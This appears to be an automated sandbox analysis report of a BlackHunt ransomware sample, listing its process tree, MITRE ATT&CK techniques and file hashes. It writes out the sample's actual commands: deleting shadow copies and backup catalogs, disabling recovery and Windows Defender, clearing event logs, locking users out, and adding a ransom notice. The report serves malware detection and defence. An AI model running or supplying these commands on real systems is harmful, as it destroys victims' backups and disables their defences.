- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7372
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe" /F2⤵PID:4960
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe" /F3⤵
- Creates scheduled task(s)
PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2932
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2024
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2552
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1708
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3408
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3496 -
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3044
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3464
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:316
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:8140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:4864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:15116
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:10156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:15344
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:16368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:5184
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:8308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 14644⤵
- Program crash
PID:8492
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"2⤵PID:16144
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:6140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:16772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:15140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:17508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:14948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:14904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4724
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵PID:3496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:3584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:4940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:7016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4392
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:3584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:4976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:7376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2424
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:7612
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:4848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:4520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:4388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:5020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:1544
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:19012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:868
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:5084
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7488
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1644
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:13132
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1604
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:15352
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
PID:15864
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:4864
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:17092
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:5140
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:6536
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:5572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 8308 -ip 83081⤵PID:6128
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:9988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:9304
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:6312
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:8288
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:6320
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:8084
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2808
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:6552
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:16780
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:15300
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:15144
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:12512
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:15068
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567a1457e17ac85ce8d380db2934df69e
SHA13149f80620f8a25002b2e17fdd9dcea7962abebb
SHA2568f41273da28798c1d6cb4b4978016c8e0cdfb91a920105c8cb077bd9d45aa37a
SHA512bde0607a06d414cb93ccea03f401d6314c91cd5562c8f31b96b503ab492b7e5f649eadee5324dc8107b6a7f69c01c807db6c0c96036f4164d6efe09dcca9a043
-
Filesize
684B
MD503dd6fad858f8efe68d8b25cf1985d83
SHA14523b365674e592471272075f891168c4b5c3fe3
SHA256ae03ef9209621c2fd12eecfd945777def84c69fec0777d612c3e990cafc16395
SHA512fb6c6c2daedd2d41e9574a7327d303fe5989737d533ed07dad6a4826ddfd21e2038aed423dbee49b75e5b4f5880d2deb2b09dd5501635bf2f5a90f99fdf2b553
-
Filesize
12KB
MD52a184b0ccf76a48e8401c616316d4d0b
SHA1acf801ca39854fdb74b57dd0ae1bfe48936ecd66
SHA25607f4889a597df325c58246dd1c3471f9286593780e128b6a81794371f0b1fa6a
SHA5125ab611ebc9f36f2c1174fe578f963ce4fd2804cae811bf4951d2ffcd25a14a2929408bd8628a342861367babd86c4104bdec31cf3ba62483d7caee1aded65ebd